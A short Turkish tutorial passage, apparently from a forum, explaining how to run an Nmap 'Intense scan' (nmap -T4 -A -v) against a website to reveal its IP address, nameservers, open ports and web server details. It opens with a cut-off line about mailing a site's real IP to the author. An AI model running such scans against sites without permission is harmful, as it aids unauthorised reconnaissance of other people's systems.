        Mail adresimize raporları gönderecektir ,sitenin gerçek ip adresi ile birlikte :)


  


Nmap ile IP Analizi

 Bu konumda Nmap ile web sitesinin ip adresinin analizi nasıl yapıldığını anlatacağım.
 
  
 Konunun Altında vereceğim linkten Nmap Programını indiriyoruz.
 Target:  yazan kısma web sitesinin url adresini yazıyoruz.
 Profile: Intense scan olarak bırakın.
 Command: kısmına nmap -T4 -A -v ornek:com gibi komut çıkacaktır. 
 Scan yaptıktan sonra sitenin ip adresini, kullandığı nameserver'ları, ip adresinin açık portlarını,
 Ve kullandığı http & https sunucusu hakkında bilgiler verir. 
  İndirme Linki: nmap-7.12-setup.exe